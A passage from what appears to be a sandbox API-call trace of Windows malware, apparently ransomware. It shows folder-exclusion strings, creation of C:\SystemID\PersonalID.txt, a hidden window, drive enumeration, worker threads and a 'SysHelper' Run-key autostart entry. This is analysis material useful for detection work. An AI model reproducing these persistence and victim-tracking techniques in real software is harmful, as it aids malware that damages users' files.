Flags=0x0, Size=0x83a) returned 0x2b47998 [0100.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b31928, cbMultiByte=-1, lpWideCharStr=0x2b47998, cchWideChar=1053 | out: lpWideCharStr="C:\\ProgramData\\Package Cache\\") returned 30 [0100.826] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x840) returned 0x2b481e0 [0100.826] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b47998 | out: hHeap=0x670000) returned 1 [0100.827] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.827] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.827] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.827] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.832] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.832] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.832] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b46910 [0100.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b31928, cbMultiByte=-1, lpWideCharStr=0x2b46910, cchWideChar=1040 | out: lpWideCharStr="C:\\Users\\Public\\") returned 17 [0100.832] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b47998 [0100.832] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b46910 | out: hHeap=0x670000) returned 1 [0100.833] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.836] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.836] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.836] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.837] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.837] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.837] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b46910 [0100.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b31928, cbMultiByte=-1, lpWideCharStr=0x2b46910, cchWideChar=1040 | out: lpWideCharStr="C:\\$Recycle.Bin\\") returned 17 [0100.838] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b48a28 [0100.838] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b46910 | out: hHeap=0x670000) returned 1 [0100.838] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x3f0) returned 0x2b1f720 [0100.839] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b249b0 | out: hHeap=0x670000) returned 1 [0100.839] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.839] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.839] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.840] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.840] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.840] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b46910 [0100.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b31928, cbMultiByte=-1, lpWideCharStr=0x2b46910, cchWideChar=1040 | out: lpWideCharStr="C:\\$WINDOWS.~BT\\") returned 17 [0100.840] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b49260 [0100.840] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b46910 | out: hHeap=0x670000) returned 1 [0100.841] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.841] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.841] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.841] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.842] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.842] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b39428 [0100.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1032 | out: lpWideCharStr="C:\\dell\\") returned 9 [0100.842] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b46910 [0100.842] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.842] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31928 [0100.842] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x2b31950 [0100.843] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31950 | out: hHeap=0x670000) returned 1 [0100.843] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31928 | out: hHeap=0x670000) returned 1 [0100.843] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x812) returned 0x2b39428 [0100.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2b39428, cchWideChar=1033 | out: lpWideCharStr="C:\\Intel\\") returned 10 [0100.843] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b49a98 [0100.844] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b39428 | out: hHeap=0x670000) returned 1 [0100.845] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e7b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.846] GetLastError () returned 0x3 [0100.846] GetLastError () returned 0x3 [0100.846] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0100.847] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18e7b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x53c [0100.848] GetFileType (hFile=0x53c) returned 0x1 [0100.849] GetLastError () returned 0x0 [0100.860] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.860] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0100.861] RegisterClassExW (param_1=0x18ea30) returned 0xc1d0 [0100.861] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xa0182 [0100.863] NtdllDefWindowProc_W () returned 0x0 [0100.864] NtdllDefWindowProc_W () returned 0x1 [0100.867] NtdllDefWindowProc_W () returned 0x0 [0100.874] NtdllDefWindowProc_W () returned 0x0 [0100.874] ShowWindow (hWnd=0xa0182, nCmdShow=0) returned 0 [0100.874] UpdateWindow (hWnd=0xa0182) returned 1 [0100.874] GetLogicalDrives () returned 0x4 [0100.875] SetErrorMode (uMode=0x1) returned 0x0 [0100.875] PathFileExistsA (pszPath="C:\\") returned 1 [0100.875] SetErrorMode (uMode=0x0) returned 0x1 [0100.875] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0100.875] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x806) returned 0x2b3e560 [0100.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18e9e8, cbMultiByte=-1, lpWideCharStr=0x2b3e560, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0100.875] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b3ed70 [0100.876] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b3e560 | out: hHeap=0x670000) returned 1 [0100.876] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x18) returned 0x2aa91d8 [0100.876] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b3ed70 | out: hHeap=0x670000) returned 1 [0100.876] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa91d8 | out: hHeap=0x670000) returned 1 [0100.876] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x18) returned 0x2aa91d8 [0100.895] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x10) returned 0x2ab0440 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x8ec) returned 0x2b3e560 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b3ee58 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2af3278 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1070) returned 0x2b58ac8 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x60) returned 0x2ad1c60 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b59b40 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x660) returned 0x2b21c90 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2af3b00 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2af4388 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2af4c10 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2af5498 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2af5d20 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x840) returned 0x2b5a358 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2af65a8 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2af6e30 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x840) returned 0x2b39c48 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x850) returned 0x2b3a490 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x850) returned 0x2b3ace8 [0100.896] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2af76b8 [0100.897] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2af7f40 [0100.897] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x840) returned 0x2b3b540 [0100.897] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x840) returned 0x2b27ee0 [0100.897] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2af87c8 [0100.897] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2af9050 [0100.897] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2af98d8 [0100.897] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2afa160 [0100.897] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b5abb8 [0100.903] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b5b440 [0100.903] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b5bcc8 [0100.903] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b5c550 [0100.903] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b5cdd8 [0100.903] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b5d660 [0100.904] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x850) returned 0x2b28728 [0100.904] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x850) returned 0x2b28f80 [0100.904] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b5dee8 [0100.904] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b5e770 [0100.904] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b5eff8 [0100.904] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x840) returned 0x2b297d8 [0100.905] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x840) returned 0x2b2a020 [0100.905] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b5f880 [0100.905] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b60108 [0100.905] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b60990 [0100.905] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b61218 [0100.905] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b61aa0 [0100.905] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b62328 [0100.905] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b62bb0 [0100.905] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b63438 [0100.905] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b63cc0 [0100.905] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x850) returned 0x2b2a868 [0100.905] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x850) returned 0x2b2b0c0 [0100.905] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b64548 [0100.906] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b64dd0 [0100.906] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b65658 [0100.906] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x840) returned 0x2b2b918 [0100.906] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x840) returned 0x2b2c160 [0100.906] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b65ee0 [0100.906] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b66768 [0100.906] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b66ff0 [0100.906] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b67878 [0100.906] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b68100 [0100.906] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b68988 [0100.906] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b69210 [0100.906] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b69a98 [0100.906] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b6abb8 [0100.907] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x850) returned 0x2b2c9a8 [0100.907] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x850) returned 0x2b2d200 [0100.907] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b6b440 [0100.907] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b6bcc8 [0100.907] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b6c550 [0100.907] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x840) returned 0x2b6cdd8 [0100.907] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b6d660 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b6dee8 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b6e770 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b6eff8 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b6f880 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0xc0) returned 0x2abcbe0 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b70108 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b2da58 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b2e270 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b70990 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b71218 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b71aa0 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b72328 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2b72bb0 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x60) returned 0x2ad1e00 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b73438 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b73cc0 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b74548 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x820) returned 0x2b74dd0 [0100.908] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x50) returned 0x2ae4360 [0100.908] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x2b3e568, dwCreationFlags=0x0, lpThreadId=0x2ab0448 | out: lpThreadId=0x2ab0448*=0xf8c) returned 0x534 [0100.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0xf90) returned 0x2c4 [0100.910] GetMessageW (in: lpMsg=0x18ebe0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18ebe0) returned 0 [0112.622] NtdllDefWindowProc_W () returned 0x0 [0112.622] NtdllDefWindowProc_W () returned 0x0 [0112.644] NtdllDefWindowProc_W () returned 0x0 [0112.645] NtdllDefWindowProc_W () returned 0x0 [0112.645] NtdllDefWindowProc_W () returned 0x0 [0112.646] NtdllDefWindowProc_W () returned 0x0 [0112.646] NtdllDefWindowProc_W () returned 0x0 [0112.646] NtdllDefWindowProc_W () returned 0x1 [0112.650] NtdllDefWindowProc_W () returned 0x0 [0112.656] NtdllDefWindowProc_W () returned 0x0 [0112.660] NtdllDefWindowProc_W () returned 0x0 [0112.661] NtdllDefWindowProc_W () returned 0x0 [0112.663] NtdllDefWindowProc_W () returned 0x3 [0112.664] NtdllDefWindowProc_W () returned 0x2 [0112.664] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d2f8 | out: phkResult=0x18d2f8*=0x540) returned 0x0 [0112.664] RegQueryValueExW (in: hKey=0x540, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d2f4, lpData=0x18ba20, lpcbData=0x18d2d8*=0x400 | out: lpType=0x18d2f4*=0x2, lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart", lpcbData=0x18d2d8*=0x132) returned 0x0 [0112.665] RegCloseKey (hKey=0x540) returned 0x0 [0112.665] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x140) returned 0x2afb8e0 [0112.665] lstrlenA (lpString="\" --AutoStart") returned 13 [0112.665] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x120) returned 0x2b22840 [0112.665] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afb8e0 | out: hHeap=0x670000) returned 1 [0112.665] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned 1 [0112.665] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b22840 | out: hHeap=0x670000) returned 1 [0112.665] IsWindow (hWnd=0xa0182) returned 1 [0112.666] DestroyWindow (hWnd=0xa0182) returned 1 [0112.666] NtdllDefWindowProc_W () returned 0x0 [0112.666] NtdllDefWindowProc_W () returned 0x1 [0112.668] NtdllDefWindowProc_W () returned 0x0 [0112.668] NtdllDefWindowProc_W () returned 0x0 [0112.668] NtdllDefWindowProc_W () returned 0x0 [0112.668] NtdllDefWindowProc_W () returned 0x0 [0112.668] NtdllDefWindowProc_W () returned 0x0 [0112.668] PostQuitMessage (nExitCode=0) [0112.670] NtdllDefWindowProc_W () returned 0x0 [0112.671] CloseHandle (hObject=0x538) returned 1 [0112.671] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2aa91d8 | out: hHeap=0x670000) returned 1 [0112.671] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b312c0 | out: hHeap=0x670000) returned 1 [0112.671] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31298 | out: hHeap=0x670000) returned 1 [0112.671] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b310e0 | out: hHeap=0x670000) returned 1 [0112.671] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31068 | out: hHeap=0x670000) returned 1 [0112.671] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b310b8 | out: hHeap=0x670000) returned 1 [0112.671] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31090 | out: hHeap=0x670000) returned 1 [0112.671] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afdcc0 | out: hHeap=0x670000) returned 1 [0112.671] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afdd30 | out: hHeap=0x670000) returned 1 [0112.671] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31108 | out: hHeap=0x670000) returned 1 [0112.671] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b311d0 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31518 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31540 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31568 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31590 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b315b8 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afdf28 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afe078 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b315e0 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31608 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31630 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31658 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31680 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b316a8 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b316d0 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b316f8 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afe0b0 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afe0e8 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31720 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31748 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31770 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31798 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b317c0 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b317e8 | out: hHeap=0x670000) returned 1 [0112.673] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31810 | out: hHeap=0x670000) returned 1 [0112.674] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31838 | out: hHeap=0x670000) returned 1 [0112.674] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afe120 | out: hHeap=0x670000) returned 1 [0112.674] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afe158 | out: hHeap=0x670000) returned 1 [0112.674] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31860 | out: hHeap=0x670000) returned 1 [0112.674] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31888 | out: hHeap=0x670000) returned 1 [0112.674] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b318b0 | out: hHeap=0x670000) returned 1 [0112.674] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b318d8 | out: hHeap=0x670000) returned 1 [0112.674] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b31900 | out: hHeap=0x670000) returned 1 [0112.674] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b213b8 | out: hHeap=0x670000) returned 1 [0112.674] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b250d8 | out: hHeap=0x670000) returned 1 [0112.675] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b32498 | out: 